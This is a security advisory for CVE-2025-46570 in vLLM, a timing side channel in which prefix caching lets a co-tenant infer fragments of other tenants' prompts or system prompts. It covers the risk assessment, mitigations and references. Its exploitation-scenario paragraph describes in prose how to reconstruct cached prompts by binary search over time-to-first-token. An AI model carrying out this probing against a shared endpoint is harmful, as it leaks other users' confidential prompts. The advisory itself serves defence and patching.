If you run vLLM in a multi-tenant environment, upgrade to 0.9.0 immediately—PageAttention prefix caching creates measurable TTFT differences that allow authenticated users to infer fragments of other tenants' prompts or system prompts. Single-tenant and isolated deployments carry negligible risk. The patch is available and straightforward; there is no justification for delay.
Risk Assessment
Low overall risk (CVSS 2.6), but contextually significant for multi-tenant LLM serving infrastructure. Exploitation requires network-level timing precision, an authenticated API account, and stable conditions to resolve sub-millisecond differences—making opportunistic attacks unlikely. The realistic threat model is a determined insider or co-tenant with sustained access probing a shared inference endpoint. Single-tenant private deployments behind a private network are not meaningfully affected.
Affected Systems
Severity & Risk
Attack Surface
Recommended Action
5 steps-
Upgrade vLLM to ≥0.9.0 (patch commit 77073c77).
-
Interim workaround: disable prefix caching (--disable-prefix-caching) at the cost of throughput degradation.
-
For multi-tenant deployments, enforce strict tenant isolation at the serving layer—separate vLLM instances per tenant eliminates the shared cache.
-
Restrict inference API access to authenticated, authorized clients only to reduce the attacker pool.
-
Monitor TTFT distributions per client for anomalous bimodal patterns that may indicate systematic timing probing.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2025-46570?
If you run vLLM in a multi-tenant environment, upgrade to 0.9.0 immediately—PageAttention prefix caching creates measurable TTFT differences that allow authenticated users to infer fragments of other tenants' prompts or system prompts. Single-tenant and isolated deployments carry negligible risk. The patch is available and straightforward; there is no justification for delay.
Is CVE-2025-46570 actively exploited?
No confirmed active exploitation of CVE-2025-46570 has been reported, but organizations should still patch proactively.
How to fix CVE-2025-46570?
1. Upgrade vLLM to ≥0.9.0 (patch commit 77073c77). 2. Interim workaround: disable prefix caching (--disable-prefix-caching) at the cost of throughput degradation. 3. For multi-tenant deployments, enforce strict tenant isolation at the serving layer—separate vLLM instances per tenant eliminates the shared cache. 4. Restrict inference API access to authenticated, authorized clients only to reduce the attacker pool. 5. Monitor TTFT distributions per client for anomalous bimodal patterns that may indicate systematic timing probing.
What systems are affected by CVE-2025-46570?
This vulnerability affects the following AI/ML architecture patterns: Multi-tenant LLM inference serving, Shared inference infrastructure, API gateway with cached LLM backends, LLM-as-a-service platforms.
What is the CVSS score for CVE-2025-46570?
CVE-2025-46570 has a CVSS v3.1 base score of 2.6 (LOW). The EPSS exploitation probability is 0.18%.
Technical Details
NVD Description
vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.
Exploitation Scenario
An adversary with a valid API account on a shared vLLM endpoint systematically submits prompts sharing prefixes with suspected system prompts or other users' conversation starters. Cache hit = fast TTFT, cache miss = slow TTFT. By performing a binary search over the prompt space across many requests, the attacker reconstructs cached prefix fragments character-by-character or token-by-token. The attack is noisy, requires stable network conditions to resolve timing differences reliably, and leaves a distinctive high-volume query pattern in access logs—but a patient attacker in a low-noise environment can extract meaningful fragments of proprietary or sensitive prompts.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N References
- github.com/advisories/GHSA-4qjh-9fv9-r85r
- github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2025-53.yaml
- nvd.nist.gov/vuln/detail/CVE-2025-46570
- github.com/vllm-project/vllm/commit/77073c77bc2006eb80ea6d5128f076f5e6c6f54f Patch
- github.com/vllm-project/vllm/pull/17045 Issue Vendor
- github.com/vllm-project/vllm/security/advisories/GHSA-4qjh-9fv9-r85r Vendor
Timeline
Related Vulnerabilities
CVE-2024-9053 9.8 vllm: RCE via unsafe pickle deserialization in RPC server
Same package: vllm CVE-2026-25960 9.8 vllm: SSRF allows internal network access
Same package: vllm CVE-2025-47277 9.8 vLLM: RCE via exposed TCPStore in distributed inference
Same package: vllm CVE-2024-11041 9.8 vllm: RCE via unsafe pickle deserialization in MessageQueue
Same package: vllm CVE-2025-32444 9.8 vLLM: RCE via pickle deserialization on ZeroMQ
Same package: vllm
AI Threat Alert